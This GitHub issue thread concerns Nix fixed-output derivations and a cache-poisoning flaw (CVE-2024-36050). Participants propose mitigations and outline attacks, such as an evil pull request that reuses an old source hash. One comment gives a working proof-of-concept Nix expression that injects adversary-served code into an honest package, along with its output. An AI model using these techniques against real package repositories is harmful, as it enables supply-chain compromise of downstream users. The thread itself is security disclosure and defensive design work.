Open magnetophon opened 8 years ago
In fixed-output derivations, the hash is content-addressed. We could make the URL part of the hash, but then a mirror/URL change would trigger a rebuild, which would be very unfortunate.
I propose changing the workflow for how you change sources, but I realize that's poor UX.
I want to better understand the "stuck with the wrong source" thing you mention because I haven't experienced it, but otherwise I'm basically with @domenkozar on this. I don't like the usability aspects either, but I don't know how to retain the nice content-centric properties without something like this.
One option, possibly more work than someone's willing to put into solving this, is for Nix to maintain a local cache of fixed-output derivation output hashes and the regular-derivation-style input hash that led to that output hash. This could be stored as a very simple "output-hash -> regular-derivation-hash" KV mapping. Then it could simply warn you that it's seeing the same output hash coming from a different derivation, which isn't necessarily an error but might be interesting to the user.
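A minimal sketch of what that cache could look like, assuming a simple in-memory map (real Nix would presumably persist this in its SQLite database; all names here are illustrative, not actual Nix internals):

```python
# Hypothetical cache: fixed output hash -> the regular-derivation-style input
# hash that first produced it. Warn when the same output is claimed by a new one.
seen = {}

def record_fixed_output(output_hash, derivation_hash):
    previous = seen.get(output_hash)
    if previous is None:
        seen[output_hash] = derivation_hash
    elif previous != derivation_hash:
        # Not necessarily an error, but interesting to the user: the same
        # content is now claimed by a different derivation (URL change,
        # rename, or something more sinister).
        print(f"warning: output {output_hash} was produced by {previous}, "
              f"now claimed by {derivation_hash}")
```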
@domenkozar: Could you expand on "I propose changing the workflow for how you change sources, but I realize that's poor UX"?
@copumpkin: What I mean is: Nix will write the old source into the store, under the new name.
It won't re-fetch it if you just change the hash; you have to remove the "old source under the new name" first.
@ both of you: it seems this issue is not as easy to fix as I hoped. Feel free to close it if you want.
What I mean is: Nix will write the old source into the store, under the new name. It won't re-fetch it if you just change the hash; you have to remove the "old source under the new name" first.
I'm confused. The way Nix thinks about fixed-output derivations is as follows: the output hash identifies the content, and the URLs in `fetchurl`, the git repo specs for `fetchgit`, and basically all the scripts that call `git` or `curl` or whatever are "hints" for how to produce that content. If the content already exists, the scripts won't be run. If the content doesn't exist, and the script produces data with a different hash, Nix will complain that the hash doesn't match and quit.

So here are the scenarios I can think of. The relevant one: you change the hash but not the URL in `fetchurl`. Nix will fetch the original URL, check it against the new hash you changed, and complain that the hashes don't match.

It sounds like you're saying this case is leaving junk in the store that's identified with the new hash but contains the old data, but that doesn't fit with my understanding of how things work. What am I missing?
@copumpkin: I'm talking about changing the version (or the name in general) of the package and the URL, but not the hash. AFAIK, in that case it doesn't matter whether the content is already in the store: it'll be stored again under the new name.
Sorry for the confusion; I hope I'm clear now.
I see the opposite in my tests:

```
Welcome to Nix version 1.11.2. Type :? for help.

nix-repl> let pkgs = import <nixpkgs> {}; in pkgs.fetchurl { url = "http://example.com/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }
«derivation /blah/nix/store/9hj80g8r12q74wk6k0wq8zfi1bf6glgn-test.tar.gz.drv»

nix-repl> let pkgs = import <nixpkgs> {}; in pkgs.fetchurl { url = "http://example.org/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }
«derivation /blah/nix/store/6zh44fbv7agc7n7il0wprzg6hv1khwha-test.tar.gz.drv»

nix-repl> let pkgs = import <nixpkgs> {}; in pkgs.stdenv.mkDerivation { name = "test"; src = pkgs.fetchurl { url = "http://example.com/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }; }
«derivation /blah/nix/store/zbajq1zcsz90z8dnnfxfi5d1a36kk17l-test.drv»

nix-repl> let pkgs = import <nixpkgs> {}; in pkgs.stdenv.mkDerivation { name = "test"; src = pkgs.fetchurl { url = "http://example.org/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }; }
«derivation /blah/nix/store/dvhk6cw4am7r9rgyjb1q7rwqdww6cns7-test.drv»
```
I would think that Nix shouldn't care about a URL change as long as the hash stays the same. But in reality, changing the URL gives me both a re-download and a (massive) rebuild.
@veprbl we're talking about the realized derivation hash, not the derivation hash itself.
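A note on the transcript above: the two fetchurl .drv files differ, but they map to the same output path, since a fixed-output derivation's output path depends only on its name and output hash. Something like this (drv paths taken from the transcript) should print the same store path twice:

```
$ nix-store -q --outputs /blah/nix/store/9hj80g8r12q74wk6k0wq8zfi1bf6glgn-test.tar.gz.drv
$ nix-store -q --outputs /blah/nix/store/6zh44fbv7agc7n7il0wprzg6hv1khwha-test.tar.gz.drv
```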
@magnetophon
I was getting:

```
$ nix-store --delete /nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16
error: cannot delete path ‘/nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16’ since it is still alive
```

So I ran:

```
$ nix-store -q --roots /nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16
```

and deleted the result symlinks reported by that command. After that, nix-build picked up the changed URL.
I marked this as stale due to inactivity. → More info
To remove the stale label, just leave a new comment.
I was thinking, would it make sense to add an option like `--force-redownload` that would try to re-download the source of the currently built package and double-check that the hash corresponds? It could help people quickly check whether the hash in a derivation is correct. (EDIT: actually, I think the current behavior brings some security issues; let me test it first.)
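For what it's worth, something close to this already exists via `--check` (discussed further down in this thread): it re-runs the builder even though the output is valid and compares the result, which for a fixed-output derivation means re-downloading the source and re-verifying the hash. Roughly:

```
$ nix-store -r --check /nix/store/<...>-source.drv
```

(newer interfaces spell it `nix build --rebuild`).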
One option, possibly more work than someone's willing to put into solving this, is for Nix to maintain a local cache of fixed-output derivation output hashes and the regular-derivation-style input hash that led to that output hash.
Doesn't Nix already track this for garbage-collection purposes? `nix-store -q --deriver` and `nix-store -q --valid-derivers` should give you enough information to triangulate this.
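For example (store path shortened for illustration; the second command needs a Nix new enough to support `--valid-derivers`):

```
$ nix-store -q --deriver /nix/store/<hash>-source
$ nix-store -q --valid-derivers /nix/store/<hash>-source
```

Though, as pointed out later in the thread, Nix only records one deriver per output path, so this is not quite enough by itself.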
I can confirm that this bug can lead to some security issues, described in an email sent to the security team (I'll likely create a public issue soonish). Other potential attacks (if other functionality like cache sharing between OfBorg and reviewers/Hydra is implemented) are described in https://github.com/NixOS/ofborg/issues/68#issuecomment-2083351493
What I propose to solve this is to keep on each Nix installation a map `URL -> hash` (or rather, as suggested by Linus in a private email, a map `derivation -> hash`, since fixed-output derivations can be much more general than downloading a file). For any fixed-output derivation, if `hash` is already present on the system, Nix should first check that the URL/derivation is also contained in the database with the appropriate hash. If not, it should re-execute the derivation, check that the hash is correct, and if so continue from the cached value.
EDIT: See my proposition here https://github.com/NixOS/ofborg/issues/68#issuecomment-2085327052 for a more robust version
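A sketch of the proposed check, assuming a local trusted `derivation -> hash` map (function and variable names here are illustrative, not actual Nix internals; the fetch and hash helpers are passed in as assumptions):

```python
def realize_fod(drv, expected_hash, trusted_map, store, run_derivation, hash_output):
    # Content with this hash is already in the store: only reuse it when this
    # exact derivation was previously verified to produce it.
    if expected_hash in store and trusted_map.get(drv) == expected_hash:
        return store[expected_hash]
    # Unknown derivation for this hash: re-execute and verify before reuse.
    out = run_derivation(drv)                # assumed helper: runs the fetch script
    if hash_output(out) != expected_hash:    # assumed helper: hashes the output
        raise RuntimeError("hash mismatch: refusing to (re)use this output")
    trusted_map[drv] = expected_hash
    store[expected_hash] = out
    return out
```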
@tobiasBora
After @risicle pointed me your way in https://github.com/NixOS/rfcs/pull/171#issuecomment-2095639253, and after reading your comments in https://github.com/NixOS/ofborg/issues/68, I came up with a very simple, currently undetectable way to poison Hydra's cache in https://github.com/NixOS/rfcs/pull/171#issuecomment-2096283938:
But now thinking about this, I have an IMHO much simpler and thus scarier attack that will work against Hydra:
- Malice makes an evil PR with a package update that changes the source's revision to a new version but points the hash to a hash of an older version of the same package, a version which has a well-known CVE.
- A very paranoid Nixpkgs maintainer Alice (who does not use any build caches) looks at it; it looks fine, so she builds it, and it works fine, since Alice has the older version of the source in `/nix/store`, and so she merges it.
- All tools that track unfixed CVEs in Nixpkgs only look at package versions, so those will be fooled too.
- Malice can now exploit the CVE.
So, this is actually a critical bug.
Merging https://github.com/NixOS/nixpkgs/pull/49862, setting `nameSourcesPrettily = true` or `nameSourcesPrettily = "full"` by default, and banning custom-named source derivations is a workaround that will work in the meantime.
Yes, I actually realized exactly this issue with `fetchzip` this morning and transmitted an MWE to the security team showing that one can use the code of any package controlled by an adversary to inject code into any other package, exploiting the fact that `fetchzip` removes the package name & version from the attribute name, making the attack trivial to carry out: the difference between a malicious & an honest derivation is just one hash.
As a result, I submitted a CVE online.
Patching fetchzip as discussed in https://github.com/NixOS/rfcs/pull/171 is only a first step but does not stop the slightly more involved cache poisoning attacks. The only robust fix I can think of is what I am proposing in https://github.com/NixOS/ofborg/issues/68#issuecomment-2085327052
Merging NixOS/nixpkgs#49862, setting `nameSourcesPrettily = true` or `nameSourcesPrettily = "full"` by default, and banning custom-named source derivations is a workaround that will work in the meantime.
That might be a first quick mitigation (actually not needed if we implement https://github.com/NixOS/ofborg/issues/68#issuecomment-2085327052), but it is not sufficient: nobody would notice if a derivation is misnamed, for instance in a long automatically generated file.
The only robust fix I can think of is what I am proposing in https://github.com/NixOS/ofborg/issues/68#issuecomment-2085327052
While your algorithm will work if you trust Hydra to do the right thing and check all fixed-output outputs, the problem is that ATM Hydra won't do it because Nix does not do it.
I.e. you are trying to prevent poisoning of your local `/nix/store` with an unrelated output substituted from a binary cache, but, as I pointed out above, the attacker can trivially poison your (and Hydra's) `/nix/store` directly too by reusing old hashes.
Merging https://github.com/NixOS/nixpkgs/pull/49862 and setting `nameSourcesPrettily = true` or `nameSourcesPrettily = "full"` by default is one work-around for this.
As hinted in https://github.com/NixOS/rfcs/pull/171#issuecomment-2082993487, making `nix-store -r --check` semantics slightly more convenient:

- when `outPath` is valid, it should build the derivation again and check that the result matches the previously known output exactly (as it does now),
- when `outPath` is not valid, it should just build the derivation twice and compare the results (the current semantics of failing in this case is surprising and inconvenient),
- for fixed-output derivations, irrespective of `outPath` validity, it should always do the build and then check the hash,

and then making OfBorg always run `nix-store -r --check` for all affected fixed-output derivations, thus limiting the set of attackers who could poison caches and `/nix/store`s to those who have direct commit access to Nixpkgs, is another work-around for this.
But the actual solution is to never reuse outputs between derivations without checking them first. I.e., Nix should remember a mapping of `outPath -> set<drvPath>` for each valid `outPath` in `/nix/store` (ATM Nix only stores one `drvPath` for each valid `outPath`, aka `nix-store -q --deriver`), and `nix-store -r` should force a re-build (i.e. `--check`) of each given derivation, even if the corresponding `outPath` already exists and is valid in `/nix/store`, in cases when that `outPath` does not have that `drvPath` in its `set<drvPath>` yet.

In other words, `/nix/store` path validity should be changed from being a flag ("is valid") to a predicate ("is valid as an output for this `drvPath`").
Similarly, substitutors should provide their `set<drvPath>` for each requested `outPath` to the client Nixes (somehow), and a client Nix should check those before accepting a substitution.

Obviously, without any optimizations that would be incredibly inconvenient: among other things, not only would changes to URLs and changes between `fetch*` functions always cause a rebuild, but any unrelated change to `stdenv.mkDerivation` would cause all derivations using any of the `fetch*` functions to be rebuilt too.
One possible way to minimize rebuilds in this case is to implement a tiny `mkDerivationLite` variant of `stdenv.mkDerivation` and use that in all `fetch*` functions. Sure, updating `curl` or `git` will still cause a lot of rebuilds, but for the paranoid this could be a good thing: after all, what if the attacker poisoned one of those somehow?
Another way to reduce rebuilds with `drvPath`-predicated validity is to add a new `outputPathToken` parameter to `derivation` which would declare to Nix that the `outPath` of this derivation is valid for any other derivation that maps to the same `outPath` and uses the same `outputPathToken`, i.e. it would declare an equivalence class of valid `drvPath`s for each `outPath` (i.e., in the above, `set<drvPath>` becomes `set<drvPath or outputPathToken>`).
Then:

- setting `outputPathToken` to some constant gets you the current behavior (outputs are always reused),
- leaving `outputPathToken` always unset will get you the most paranoid behavior at the cost of the most rebuilds,
- setting `outputPathToken` to different things in different `fetch*` derivations gives something in between, e.g.:
  - setting `outputPathToken` to `"fetchurl " + concatSepBy " " (sort urls)` in `fetchurl`, so that changes to URLs would cause rebuilds,
  - to `"fetchgit " + url + " rev " + rev` in `fetchgit`, so that changes to URLs and revisions would also cause rebuilds,
- `nix.conf` could then provide an option to ignore all `outputPathToken` options, for the most paranoid.
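Putting the proposal together, a minimal sketch of the resulting validity check (names invented for illustration; this is not how Nix stores things today):

```python
def may_reuse_output(derivers, out_path, drv_path, output_path_token=None):
    # derivers: out_path -> set of drvPaths and outputPathTokens already
    # checked for that output ("is valid as an output for this drvPath").
    known = derivers.get(out_path, set())
    if drv_path in known:
        return True   # this exact derivation was checked before
    if output_path_token is not None and output_path_token in known:
        return True   # same equivalence class, e.g. same fetchurl URL list
    return False      # otherwise: force a rebuild, i.e. nix-store -r --check
```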
I have to admit I don't yet fully grasp all of your proposition, but here are a few comments after a first reading:
While your algorithm will work if you trust Hydra to do the right thing and check all fixed-output outputs, the problem is that ATM Hydra won't do it because Nix does not do it.
Well, I precisely want Nix to implement it. All other solutions would either not work or require the user to do massive downloads (if the data doesn't exist, you have no other way than regenerating it yourself) to check all FODs, which can lead to many issues. Not only would the user need to download the (transitive) sources of all packages they want to install, even if they only care about the final binary, but if the source is not available anymore at its current location, then the user would not even be able to install the binary (and the security team mentioned to me that they don't want to go down this path, as it used to be this way and created many issues).
I.e. you are trying to prevent poisoning of your local `/nix/store` with an unrelated output substituted from a binary cache, but, as I pointed out above, the attacker can trivially poison your (and Hydra's) `/nix/store` directly too by reusing old hashes.
If one changes Nix the way I propose, I don't see how anyone could poison Hydra's cache (of course, assuming we trust Hydra itself… but one already needs to trust Hydra for many other reasons anyway). The new `derivation -> hash` map is precisely used to say "Hydra checked that this FOD `derivation` evaluates to `hash`", i.e. "no poisoning has been done on this derivation". In particular, old hashes would NOT be part of this trusted map until Hydra checks that they are indeed correct.
setting `nameSourcesPrettily = true` or `nameSourcesPrettily = "full"` by default is one work-around for this.
I don't see it as a true work-around. It makes one very particular attack (downgrading) harder, but there are many other ways to pollute a cache, for instance by adding (e.g. a few months in advance, to be sure it is in Hydra's cache) a malicious dependency in some automatically generated file with the name & version of the program to attack.
Nix should remember a mapping of `outPath -> set<drvPath>` for each valid `outPath` in `/nix/store`

I think this is more or less what I proposed, just with the map the other way around, as I was proposing `drvPath -> outPath` instead; & I also propose to let cache.nixos.org/… share this map.
One possible way to minimize rebuilds […]

What do you call a rebuild here? Is it in the sense that:

- the FOD output should be re-checked by Hydra, to complete the map `drvPath -> outPath` (which indeed should be done by Hydra if the `fetch*` functions change, and I guess having a lite version of `mkDerivation` makes sense if these often change)
- the FOD output should be re-checked by the end user: this should NOT be the case, at least if Hydra already did it before and if we implement the sharing of `drvPath -> outPath` I was proposing above
- the whole world should be rebuilt: this should NOT be the case; once the user is assured that the hash is correct, they can use the old derivation as before
I was proposing above(of course if we trust Hydra itself… but one anyway already needs to trust Hydra for many other reasons)
What reasons? If I'm not using the Hydra binary cache and I'm not using the default bootstrap tarballs, what is there to trust? Tarballs downloaded from the Hydra tarball cache get hashed and checked against the hashes in their derivations locally, as they should.
I don't see it as a true work-around. It makes one very particular attack (downgrading) harder, but there are many other ways to pollute a cache, for instance by adding (e.g. a few months in advance, to be sure it is in Hydra's cache) a malicious dependency in some automatically generated file with the name & version of the program to attack.
Putting the whole revision or hash into the source derivation name and banning custom-named `fetch*` derivations will make that attack impossible.

But even without the first part (and with the `<hash>-<name>-<version or short revision>-source` scheme), sure, in theory, the attacker could still poison it by pre-`fetch*`ing an evil source in an autogenerated file with the same derivation name, if the attacker manages to guess a version number (or the prefix of the revision) with a CVE they could attack in advance.

So... almost never.

And then, users like me, who do not build anything from those huge autogenerated files and are not using the Hydra binary cache, will catch those mis-hashes immediately.
I've been running with https://github.com/NixOS/nixpkgs/pull/49862 and `nameSourcesPrettily = "full"` enabled since 2018 (essentially: implementation details changed over time, but the behavior did not).
Do I use a small subset of Nixpkgs? Yes. Do source URLs still fail to fetch sometimes? Yes.
But usually things are pretty easy to fix, and older source versions usually can be found on archive servers without changes to any hashes.
But now, remembering the uncountable number of times I had to fix fixed-output hashes locally to make my systems build, I'm feeling kind of paranoid. Were all those outputs mis-hashed in honest error, or were some of them attempts to poison something?

Some of those mis-hashes persisted for months in `master` while I was too annoyed with the PR process, thinking them honest errors that would be fixed eventually by people with direct commit access.
Was something poisoned already?
... implementation ...
I think this is more or less what I proposed, just with the map the other way around, as I was proposing `drvPath -> outPath` instead; & I also propose to let cache.nixos.org/… share this map.
Yes, algorithmically we are proposing the same thing, but I'm essentially proposing we reuse the existing Nix derivers mechanism for this, and while you are talking about how to make Hydra publish its derivers and make Nix use them, I'm pointing out that Hydra publishing its derivers is not enough: if Hydra does not have the output in its cache yet, then the user will have to `--fallback` build locally, meaning local Nix will have to do the check too, which means checking that the source derivation is in the checked derivers set of that output, which would frequently fail, which would mean frequent mass rebuilds. So I'm proposing a way to minimize those, and `outputPathToken` is a clever and simple solution, IMHO.
Precise formats of `outputPathToken` for different `fetch*`ers and their security implications could and should be discussed.
One possible way to minimize rebuilds […]

What do you call a rebuild here? Is it in the sense that:

- the FOD output should be re-checked by Hydra, to complete the map `drvPath -> outPath` (which indeed should be done by Hydra if the `fetch*` functions change, and I guess having a lite version of `mkDerivation` makes sense if these often change)
I.e., in the terminology I use in my proposal, you are stating that Nix should ask its substitutors for their derivers set for the `outPath` it tries to substitute and then check that the source derivation is in that set. To which I agree.
- the FOD output should be re-checked by the end user: this should NOT be the case, at least if Hydra already did it before and if we implement the sharing of `drvPath -> outPath` I was proposing above
Sure, if substitutors are enabled, then Nix should only do a "member of a set" check, not a full derivation rebuild (i.e. `nix-store -r --check`, which is what I call a "rebuild", because `nix build --rebuild` does it).
- the whole world should be rebuilt: this should NOT be the case; once the user is assured that the hash is correct, they can use the old derivation as before
But if the user does not use Hydra, and `curl` changed, and the user is feeling sufficiently paranoid, I would think having a way to re-check everything would be a good thing.
What reasons?
Anyone relying on cache.nixos.org (which is likely 99% of users) needs to trust Hydra, as it can always inject malicious code inside the final binary… like Debian users need to trust Debian maintainers. And I don't see how checking the hash can help here: programs are not FODs and their hashes may vary across builds in general, so until we have succinct verifiable proofs of honest compilation (which, let's be honest, is never going to happen) or at least 100% reproducible builds, we need to trust Hydra.

Anyway, the attack I describe would also apply to people NOT using Hydra, so building everything from source will not help, since it will pick the wrong source.
If the attacker manages to guess a version number (or the prefix of the revision) with a CVE they could attack in advance. So... almost never.
I think you misunderstand the attack I have in mind. What I describe allows any adversary to inject arbitrarily malicious code (irrespective of whether the actual program has a CVE or not) into a future release of any program, assuming they can simply guess the name of the release… which is trivial (release names usually simply increase one by one and are often pre-released in an alpha form like `3.42-alpha`).
But now, remembering the uncountable number of times I had to fix fixed-output hashes locally
Is that really the experience we want for Nix end users?
Was something poisoned already?
Hard to say. I tried to do a quick check in Nixpkgs by looking at duplicated hashes (but it is possible to apply a different attack so that this does not appear as clearly). The number of duplicated hashes is quite large, so I used a script to help me discard the good-looking ones, but most of them seem quite honest. Only two physics programs (in pkgs/by-name) were sharing the same hash while having very different names… but I had no time to investigate further.
which would mean frequent mass rebuilds
I don't see why we would get more rebuilds than now. If a program is in the cache, Hydra already downloaded its source, so the user can rely on Hydra's map. If Hydra has not built the package yet… the user needs to rebuild everything anyway. And if the package is a "legacy package", in the sense that it was built by Hydra before we even started to add this option, what I propose (maybe what you propose as well; I'm not sure I understand all the details) allows the user to only download & check the source while using the binary compiled by Hydra (which saves most of the time-consuming part).
Precise formats of `outputPathToken` for different `fetch*`ers and their security implications could and should be discussed.
I'm not sure I understand all the details of your proposition here (maybe because I lack some knowledge of Nix's internals), but I think I get the big picture. I think creating equivalence classes of derivations (which, I think, could be a nice concept in Nix in general) could be a nice way to limit rebuilds in case of curl updates… but your implementation with `outputPathToken` raises a number of questions, including in terms of security:

- Who can set an `outputPathToken`? If any derivation & fetcher can set this option (as is the case for now, as I understand it), this provides basically no additional security, as the attacker could always submit an obfuscated FOD that sets `outputPathToken` to the one used in `fetchgit`/… So for this to work, `outputPathToken` must be added by a new mechanism in Nix, and not via the usual derivation.
- `outputPathToken` should be an indication from the fetcher, but Nix should provide command-line options to follow or not these recommendations from the fetcher (in a more or less paranoid way).
- `outputPathToken` alone is not sufficient, as it does not assert that the hash is correct. Notably, if I try to execute a derivation and realize that the provided hash is not correct, one MUST REMOVE this derivation from `/nix/store`, otherwise we will have no way of knowing whether a derivation really evaluates to a given hash.

So, based on the first point, since it seems hard to only allow specific fetchers to create a given `outputPathToken` (unless you know some special tricks?), and since a new Nix concept must be introduced anyway, we can maybe deal with this by creating a new kind of derivation that specifies what must be downloaded and not how to obtain it, as is the case now. For instance, one could create a derivation like:
```
Derive([
  "kind": "fetchurl",
  "url": "myurl",
  "out": "/nix/store/foo.tar.xz",
  "sha256": "somehash"
])
```
and Nix should automatically understand that, when receiving this derivation, it should download the URL, using any curl version it wants, as long as the hash matches at the end. If we don't want to hardcode all the fetchers in Nix itself (let's try to keep Nix small), we can let Nix take as input a special Nix file `trusted-fetchers.nix` containing all the "trusted fetchers". This could be a map like `kind -> fetcher`, such that when Nix encounters a custom derivation it is not able to evaluate, it would resort instead to using the fetcher in the map. This means that we only need to check `trusted-fetchers.nix` instead of Nixpkgs in its totality.
More specifically, `fetcher` could be a function taking as input the above derivation, and outputting a bit Ok/Not-ok (and possibly an error message) and a folder, such that the folder is kept in `out` by Nix iff the bit is true (this bit would intuitively mean "I checked that the hash is correct").
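In Python terms, the contract could look roughly like this (entirely hypothetical; `download` and `sha256_of` stand in for whatever the trusted script actually does):

```python
def fetchurl_fetcher(drv, download, sha256_of):
    # Returns (ok, error_message, path); Nix keeps `path` as $out iff ok,
    # i.e. the fetcher itself vouches that the declared hash is correct.
    path = download(drv["url"])
    if sha256_of(path) != drv["sha256"]:
        return (False, "hash mismatch", None)
    return (True, None, path)
```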
This idea of equivalence of fetchers could certainly also be used to solve other issues with non-deterministic processes. For instance, for now we have no solution to avoid hash shifts with `leaveDotGit = true;`: https://github.com/NixOS/nixpkgs/issues/8567, and certainly many other package-manager things. One option here would be to create a derivation:
```
Derive([
  "kind": "fetchgit",
  "url": "git repo",
  "leaveDotGit": true,
  "out": "/nix/store/foo.tar.xz",
  "sha256": "somehash"
])
```
where the hash only corresponds to the "stable" part of the package, i.e. what is outside `.git`. The fetcher would then run `git clone` to clone the package, compute the hash of the "valid" part, and output "OK" if this hash is valid.
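A sketch of how such a fetcher could hash only the stable part of a checkout, assuming "stable" means everything outside `.git` (helper written for illustration; a real implementation would also need to handle symlinks and permissions):

```python
import hashlib
import os

def hash_stable_part(checkout_dir):
    # Hash all files outside .git in a deterministic order, so the
    # non-reproducible .git directory cannot shift the result.
    h = hashlib.sha256()
    for root, dirs, files in os.walk(checkout_dir):
        dirs[:] = sorted(d for d in dirs if d != ".git")
        for name in sorted(files):
            path = os.path.join(root, name)
            h.update(os.path.relpath(path, checkout_dir).encode())
            with open(path, "rb") as f:
                h.update(f.read())
    return h.hexdigest()
```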
But if the user does not use Hydra, and `curl` changed, and the user is feeling sufficiently paranoid, I would think having a way to re-check everything would be a good thing.
Well, checking the source, I agree it's nice to have… but no need to recompile programs.
Well, checking the source, I agree it's nice to have… but no need to recompile programs.
Most of my mentions of "rebuild" above imply the context of "rebuild the source (`<name>.src`) derivation".

Package derivations (`<name>`) should not be rebuilt, of course.
What reasons?
Anyone relying on cache.nixos.org (which is likely 99% of users) needs to trust Hydra... ... Anyway, the attack I describe would also apply to people NOT using Hydra, so building everything from source will not help, since it will pick the wrong source.
My point exactly.
Some users have personal and/or shared build machines, and `/nix/store`s on those can be poisoned too.

So the solution can not be "check derivers on Hydra and/or other configured binary caches"; it has to be a general thing.
If the attacker manages to guess a version number (or the prefix of the revision) with a CVE they could attack in advance. So... almost never.
I think you misunderstand the attack I have in mind. ...
I'm referencing the exploit described in https://github.com/NixOS/nix/issues/969#issuecomment-2096302974 there.
But now, remembering the uncountable number of times I had to fix fixed-output hashes locally
Is that really the experience we want for Nix end users?
Well, those hashes are factually wrong, either in honest error or in malice.
That's just the reality of the situation.
If Hydra or OfBorg verified them all, then those packages would have been fixed in `master` instead of in my local branches.
which would mean frequent mass rebuilds
I don't see why we would get more rebuilds than now.
In the context I discuss there, say `curl` changes; now all `<name>.src` derivations that use `fetchurl` have to be rebuilt.
Precise formats of `outputPathToken` for different `fetch*`ers and their security implications could and should be discussed.

... trusted fetchers ...
Hmm, that's a good point. Specifically, yes, `outputPathToken`s are probably not a good solution when the attacker can also modify the `fetch*` derivations themselves, so it would at the very least still leave OfBorg vulnerable.
`Derive([("out", "/nix/store/foo.tar.xz", "sha256", "somehash")], [ "kind": "fetchurl", "url": "myurl", ])`
Making full-featured `curl` into a Nix builtin is a possibility (as opposed to the `fetchurlBoot` that exists now), but what about derivations fetched with `curl` and then unpacked with `zip` (like `fetchFromGitHub`)? Should `zip` be a builtin too? What about those fetched with `git`?

Even if it's just `curl` and `zip`, you'd also have to make Nix depend on SSL CAs to verify HTTPS certs, otherwise the hashes could be poisoned on your developer machine by MITMing your Nix HTTP traffic, and the ca-certs derivation is also non-trivial.

Also, at the moment, Nix built with all the optional things disabled is pretty small and can be used for minimal self-bootstrap; requiring all those things would make that harder.

So: Is it possible to do? Yes. Is it a desirable solution? Probably not.
Was something poisoned already?
Hard to say. I tried to do a quick check in Nixpkgs by looking at duplicated hashes (but it is possible to apply a different attack so that this does not appear as clearly). The number of duplicated hashes is quite large, so I used a script to help me discard the good-looking ones, but most of them seem quite honest. Only two physics programs (in pkgs/by-name) were sharing the same hash while having very different names… but I had no time to investigate further.
How are you doing this, exactly? Are you parsing Nix files by hand?

`nix-env -f ./default.nix -qa --argstr system "x86_64-linux" --attr-path --drv-path --out-path` gives output that has the right data (after all, we need to check that different `--attr-path`s don't reuse or downgrade `--out-path`s), but it only evaluates package derivations, not source derivations.

If it did, running that on successive revisions of Nixpkgs, parsing the outputs, building a DB from the results, and then printing `--out-path` reuses and downgrades would be a good first step.

(Expensive to do, though. Especially since I don't have enough memory to evaluate all of Nixpkgs in a single run of `nix-env -qa` already, and evaluating a subset is kinda useless, given that any of the autogenerated package sets can be poisoned.)
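If that data were available, the reuse/downgrade detection itself would be a small script along these lines (sketch; a tab-separated `revision, attrPath, drvPath, outPath` input format is assumed):

```python
import collections
import sys

# outPath -> set of (revision, attrPath, drvPath) claiming it; any outPath
# claimed by more than one drvPath is a reuse/downgrade candidate to inspect.
claims = collections.defaultdict(set)

for line in sys.stdin:
    rev, attr, drv, out = line.rstrip("\n").split("\t")
    claims[out].add((rev, attr, drv))

for out, who in sorted(claims.items()):
    if len({drv for _, _, drv in who}) > 1:
        print(f"{out} is claimed by multiple derivations:")
        for rev, attr, drv in sorted(who):
            print(f"  {rev} {attr} {drv}")
```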
I guess the simplest way to do this, cheaper than doing `nix-env -qaP` followed by `nix-instantiate -A` on all `--attr-path`s, and then `nix-store -q --requisites`, followed by parsing the `.drv` files manually (which would be crazy expensive to do and would also torture your SSD), would be implementing a `nix-env -q --all` option, so that `nix-env -f ./default.nix -q --all --argstr system "x86_64-linux" --attr-path --drv-path --out-path` would print that data for all `derivation`s Nix encounters while doing evaluations, not only the ones `--available` from the current Nix expression.
My ability to patch Nix sources is fairly superficial ATM and I don't really care for this much, given that https://github.com/NixOS/nixpkgs/pull/49862 with a small custom-name-warning change on top basically solves the problem for me (given that I don't use Hydra).
But it would be nice if someone could implement that `nix-env -q --all`, and then possibly somebody else could share all those evaluations on a bunch of revisions of `master`, so that we could check if Hydra and all users using it were PWNed yet.
This issue has been mentioned on NixOS Discourse. There might be relevant details there:
https://discourse.nixos.org/t/nixpkgs-supply-chain-security-project/34345/19
I'm not sure why my last answer was not posted. In the meantime, the CVE got published at https://nvd.nist.gov/vuln/detail/CVE-2024-36050
Package derivations (`<name>`) should not be rebuilt, of course.
Good, I just wanted to be sure we are on the same page.
So the solution can not be "check derivers on Hydra and/or other configured binary caches"; it has to be a general thing.
Definitely agree. My point was just to try to reduce the amount of material downloaded, from the user's perspective, by using the cache when available; otherwise users (especially those with little bandwidth) would suffer a lot, and if the source moved they would get a 404 error even if it is still cached.
I'm referencing the exploit described in #969 (comment) there.
I show a much more generic attack here: https://github.com/leo-colisson/CVE_NixOs_cache_spoil/, with some variants using `fetchurl` instead of `fetchzip`, etc. For instance, this:
```nix
{ pkgs ? import <nixpkgs> {} }:
pkgs.callPackage ({stdenv, fetchzip}:
  let
    iconpackage = stdenv.mkDerivation rec {
      pname = "iconpackage";
      version = "42.0";
      src = fetchzip {
        url = "http://localhost:8042/iconpackage-${version}.tar.gz"; # <-- this is controlled by the adversary
        sha256 = "sha256-kACAk1+Se9vaJN8FkqLRJsOI7szD9zw015nCxxT54bs=";
      };
      buildPhase = ":";
      installPhase = ''
        mkdir -p $out/share/icons/hicolor/64x64/apps/
        mv myicon.png $out/share/icons/hicolor/64x64/apps/
      '';
    };
    honestpackage = stdenv.mkDerivation rec {
      pname = "honestpackage";
      version = "1.0";
      src = fetchzip {
        url = "http://localhost:8042/honestpackage-${version}.tar.gz"; # <-- this is NOT controlled by the adversary
        sha256 = "sha256-kACAk1+Se9vaJN8FkqLRJsOI7szD9zw015nCxxT54bs=";
      };
      buildInputs = [ iconpackage ];
      buildPhase = ":";
      installPhase = ''
        mkdir -p $out/bin
        mv honestpackage.sh $out/bin
      '';
    };
  in honestpackage
) {}
```
would result in:

```
$ nix-build
$ ./result/bin/honestpackage
I am malicious >:-|
```
In the context I discuss there, say `curl` changes; now all `<name>.src` derivations that use `fetchurl` have to be rebuilt.

Yeah, I see now; hence my proposition to have trusted fetchers.
Specifically, yes, `outputPathToken`s are probably not a good solution when the attacker can also modify the `fetch*` derivations themselves

